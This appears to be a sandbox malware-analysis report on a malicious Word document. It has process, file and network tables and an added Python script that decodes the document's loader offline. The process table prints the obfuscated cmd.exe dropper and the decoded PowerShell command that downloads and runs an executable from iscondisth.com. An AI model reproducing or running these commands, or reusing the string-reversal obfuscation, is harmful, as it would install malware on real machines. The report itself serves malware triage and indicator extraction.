Field | Value |
---|---|
File name | Chathamcollisionrepair.doc |
Full analysis | https://app.any.run/tasks/f897c1e2-e4aa-4d7b-9b4f-24438fb163ee |
Verdict | Malicious activity |
Analysis date | December 18, 2018, 14:21:49 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/msword |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 09:01:00 2018, Last Saved Time/Date: Tue Dec 18 09:01:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 35, Security: 0 |
MD5 | 221B0DADB4F9720012B6DF51BCBF3641 |
SHA1 | 6FFA329E3770E28D1E80B887E888C86AE7C5510B |
SHA256 | D2CE1B4076F9F0674C01155E3A0C2F931DA8CA7CBB81C1049A597D8724179F87 |
SSDEEP | 768:5+VucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBZYr0nsGG2Cd9S+1o9Y:Qocn1kp59gxBK85fBZYkURS+a9Y |
Extension | Identification | Confidence (%) |
---|---|---|
.doc | Microsoft Word document | 54.2 |
.doc | Microsoft Word document (old ver.) | 32.2 |
Property | Value |
---|---|
Title | - |
Subject | - |
Author | - |
Keywords | - |
Comments | - |
Template | Normal.dotm |
LastModifiedBy | - |
RevisionNumber | 1 |
Software | Microsoft Office Word |
TotalEditTime | - |
CreateDate | 2018:12:18 09:01:00 |
ModifyDate | 2018:12:18 09:01:00 |
Pages | 1 |
Words | 5 |
Characters | 35 |
Security | None |
CodePage | Windows Cyrillic |
Company | - |
Lines | 1 |
Paragraphs | 1 |
CharCountWithSpaces | 39 |
AppVersion | 16 |
ScaleCrop | No |
LinksUpToDate | No |
SharedDoc | No |
HyperlinksChanged | No |
TitleOfParts | - |
HeadingPairs | - |
CompObjUserTypeLen | 32 |
CompObjUserType | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Chathamcollisionrepair.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
1900 | c:\LfRWscp\jzcKOAbAt\BWDJOMYbuEn\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set zUI=;'aVi'=Gtr$}}{hctac}};kaerb;'ZNB'=CLN$;juS$ metI-ekovnI{ )00008 eg- htgnel.)juS$ metI-teG(( fI;'SUq'=fiO$;)juS$ ,Rmz$(eliFdaolnwoD.pvV${yrt{)sXu$ ni Rmz$(hcaerof;'exe.'+ttr$+'\'+pmet:vne$=juS$;'EoL'=QMX$;'008' = ttr$;'ErR'=VsO$;)'@'(tilpS.'sdd.31onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=sXu$;tneilCbeW.teN tcejbo-wen=pvV$;'IVB'=STT$ llehsrewop&&for /L %J in (356,-1,0)do set FvI1=!FvI1!!zUI:~%J,1!&&if %J lss 1 call %FvI1:*FvI1!=%" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
2660 | CmD /V/C"set zUI=;'aVi'=Gtr$}}{hctac}};kaerb;'ZNB'=CLN$;juS$ metI-ekovnI{ )00008 eg- htgnel.)juS$ metI-teG(( fI;'SUq'=fiO$;)juS$ ,Rmz$(eliFdaolnwoD.pvV${yrt{)sXu$ ni Rmz$(hcaerof;'exe.'+ttr$+'\'+pmet:vne$=juS$;'EoL'=QMX$;'008' = ttr$;'ErR'=VsO$;)'@'(tilpS.'sdd.31onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=sXu$;tneilCbeW.teN tcejbo-wen=pvV$;'IVB'=STT$ llehsrewop&&for /L %J in (356,-1,0)do set FvI1=!FvI1!!zUI:~%J,1!&&if %J lss 1 call %FvI1:*FvI1!=%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
2336 | powershell $TTS='BVI';$Vvp=new-object Net.WebClient;$uXs='http://iscondisth.com/rez-senqo/o402ek2m.php?l=sixino13.dds'.Split('@');$OsV='RrE';$rtt = '800';$XMQ='LoE';$Suj=$env:temp+'\'+$rtt+'.exe';foreach($zmR in $uXs){try{$Vvp.DownloadFile($zmR, $Suj);$Oif='qUS';If ((Get-Item $Suj).length -ge 80000) {Invoke-Item $Suj;$NLC='BNZ';break;}}catch{}}$rtG='iVa'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |

PID | User | Company | Integrity level | Description | Version | Exit code |
---|---|---|---|---|---|---|
2944 | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 14.0.6024.1000 | — |
1900 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0 |
2660 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0 |
2336 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) | 0 |

The three child processes are one loader seen at successive stages. PID 2660 is the PID 1900 command line after cmd.exe expanded `%ProgramData:~0,1%%ProgramData:~9,2%` (character 0 and characters 9-10 of `C:\ProgramData`) to `CmD`. PID 2336 is the `zUI` string after the `for /L %J in (356,-1,0)` loop copied it one character at a time from index 356 down to 0, which reverses it, and `call` executed the rebuilt text: a `Net.WebClient` download of `%TEMP%\800.exe` from iscondisth.com, run with `Invoke-Item` only if the file is at least 80000 bytes.
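The Python script below is an added example for this page, not part of the ANY.RUN report or its tooling. It replays the two cmd.exe tricks in the PID 1900 command line offline: the `%VAR:~start,len%` substring expansion that yields `CmD`, and the `for /L` loop that rebuilds the reversed `zUI` string. It then checks the result against the PowerShell the sandbox recorded for PID 2336 and pulls out the download URL list, the drop path and the size gate. Both command lines are copied from the table above; the only assumption is the default `%ProgramData%` value of `C:\ProgramData`.

```python
import re

# Constructed input: the cmd.exe command line recorded for PID 1900 in the
# process table above, copied verbatim.
CMDLINE = r'''c:\LfRWscp\jzcKOAbAt\BWDJOMYbuEn\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set zUI=;'aVi'=Gtr$}}{hctac}};kaerb;'ZNB'=CLN$;juS$ metI-ekovnI{ )00008 eg- htgnel.)juS$ metI-teG(( fI;'SUq'=fiO$;)juS$ ,Rmz$(eliFdaolnwoD.pvV${yrt{)sXu$ ni Rmz$(hcaerof;'exe.'+ttr$+'\'+pmet:vne$=juS$;'EoL'=QMX$;'008' = ttr$;'ErR'=VsO$;)'@'(tilpS.'sdd.31onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=sXu$;tneilCbeW.teN tcejbo-wen=pvV$;'IVB'=STT$ llehsrewop&&for /L %J in (356,-1,0)do set FvI1=!FvI1!!zUI:~%J,1!&&if %J lss 1 call %FvI1:*FvI1!=%"'''

# Ground truth: what the sandbox saw PID 2336 execute (also copied from the
# table). The decoder must reproduce this byte for byte.
RECORDED_POWERSHELL = r'''powershell $TTS='BVI';$Vvp=new-object Net.WebClient;$uXs='http://iscondisth.com/rez-senqo/o402ek2m.php?l=sixino13.dds'.Split('@');$OsV='RrE';$rtt = '800';$XMQ='LoE';$Suj=$env:temp+'\'+$rtt+'.exe';foreach($zmR in $uXs){try{$Vvp.DownloadFile($zmR, $Suj);$Oif='qUS';If ((Get-Item $Suj).length -ge 80000) {Invoke-Item $Suj;$NLC='BNZ';break;}}catch{}}$rtG='iVa';'''

# Assumption: the default %ProgramData% of Windows Vista and later.
ENV = {"ProgramData": r"C:\ProgramData"}

SUBSTR = re.compile(r"%(\w+):~(-?\d+),(-?\d+)%")

def expand_substrings(text, env=ENV):
    """Resolve cmd.exe %VAR:~start,len% expansions (see `set /?`): a negative
    start counts from the end, a negative len drops that many trailing chars.
    %ProgramData:~0,1%%ProgramData:~9,2% becomes "C" + "mD" = "CmD"."""
    def repl(m):
        value = env.get(m.group(1), "")
        start, length = int(m.group(2)), int(m.group(3))
        if start < 0:
            start = max(len(value) + start, 0)
        end = start + length if length >= 0 else len(value) + length
        return value[start:end]
    return SUBSTR.sub(repl, text)

# set VAR=<payload>&&for /L %J in (start,step,end)do set ACC=!ACC!!VAR:~%J,1!&&if %J lss 1 call %ACC:...
LOADER = re.compile(
    r"set (\w+)=(.*?)&&for /L %(\w+) in \((-?\d+),(-?\d+),(-?\d+)\)"
    r"do set (\w+)=!\7!!\1:~%\3,1!&&if %\3 lss 1 call %\7:")

def replay_for_loop(payload, start, step, stop):
    """Replay the loop: each iteration appends character J of the payload
    (empty past the end), so (N,-1,0) emits the string back to front."""
    if step == 0:
        raise ValueError("for /L with step 0 never terminates")
    chars, j = [], start
    while (j <= stop) if step > 0 else (j >= stop):
        chars.append(payload[j:j + 1])
        j += step
    return "".join(chars)

def decode_loader(cmdline, env=ENV):
    """Return (launcher, rebuilt script) for a cmd.exe stage of this shape."""
    expanded = expand_substrings(cmdline, env)
    m = re.search(r"cmd\.exe /c (\S+) /V/C", expanded, re.I)
    launcher = m.group(1) if m else None            # "CmD" after expansion
    m = LOADER.search(expanded)
    if not m:
        raise ValueError("reversed-string loader pattern not found")
    _var, payload, _j, start, step, stop, _acc = m.groups()
    # `call %FvI1:*FvI1!=%` would drop everything up to the first "FvI1!";
    # that text never occurs in the rebuilt string, so the whole value runs.
    return launcher, replay_for_loop(payload, int(start), int(step), int(stop))

PS_LITERAL = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")

def summarize_powershell(script):
    """Pull the URL list, drop path and size gate out of the decoded
    PowerShell by resolving its single-quoted string assignments."""
    literals = dict(PS_LITERAL.findall(script))
    info = {"urls": [], "drop_path": None, "min_size": None,
            "executes": "Invoke-Item" in script}
    m = re.search(r"'([^']*)'\.Split\('([^']*)'\)", script)
    if m:   # separator-delimited URL list; this sample carries one entry
        info["urls"] = [u for u in m.group(1).split(m.group(2)) if u]
    m = re.search(r"\$\w+=(\$env:\w+(?:\+(?:\$\w+|'[^']*'))+);", script)
    if m:   # $Suj=$env:temp+'\'+$rtt+'.exe'
        parts = []
        for p in m.group(1).split("+"):
            if p.startswith("'"):
                parts.append(p[1:-1])
            elif p.startswith("$env:"):
                parts.append(p)                      # kept symbolic
            else:
                parts.append(literals.get(p[1:], p))
        info["drop_path"] = "".join(parts)
    m = re.search(r"\.length -ge (\d+)", script)
    if m:
        info["min_size"] = int(m.group(1))
    return info

def main():
    launcher, script = decode_loader(CMDLINE)
    print("launcher        :", launcher)
    print("matches PID 2336:", script == RECORDED_POWERSHELL)
    for key, value in summarize_powershell(script).items():
        print(f"{key:16}: {value}")

if __name__ == "__main__":
    main()
```

Comparing the rebuilt script with the recorded PID 2336 command line is the check worth keeping: if the two differ, either the transcript of the parent command line is damaged or the loop bounds were misread, and any IOCs taken from the decoded text are suspect. Note that no `800.exe` appears in the files table and the HTTP request shows no response code or size, so the payload was not retrieved during this run.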
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA74F.tmp.cvr | — | — | — |
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\60887BFE.wmf | — | — | — |
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B85288BC.wmf | — | — | — |
2336 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AH2UYL8YCPX6ODAMFTI4.temp | — | — | — |
2336 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 0C1DAA668BA499584B0AC7476368101E | 326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA |
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B70661B1.wmf | wmf | D03255B7CEBC84DF144838CEC1444CD5 | 28E7B88ED3E38E99DA28968A536FAA26CA389A86166B7AD09BB4FA02B27A8D4B |
2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | C0E05B10780841AE15969333DA0BFE18 | 8C88F01A0964845A6E238B57D62EF68368276FA649122C778F7D617F63C6E443 |
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$athamcollisionrepair.doc | pgc | E74B02CDEE72B83CA75F7622A212B9DD | E2236C93234B6687B865FD8E4D8C8509D6E356572B5172F182BDDCB22F8FACCF |
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64237FE7.wmf | wmf | 1B5372CBFDF5EA27FA2E4D1B0ADA59FE | 8D121708145024C3BE39AC8DBE8844ADB923B654966FBC04F5BF297E87815E8C |
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | E90491F6BDAEE984309B9DB49D8F6080 | 571ED7F4E7FE66156501E80FF446AB36A23952B8A2CEE52AB90C8F3BA409FC95 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2336 | powershell.exe | GET | — | 185.231.155.12:80 | http://iscondisth.com/rez-senqo/o402ek2m.php?l=sixino13.dds | unknown | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2336 | powershell.exe | 185.231.155.12:80 | iscondisth.com | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
iscondisth.com | — | suspicious |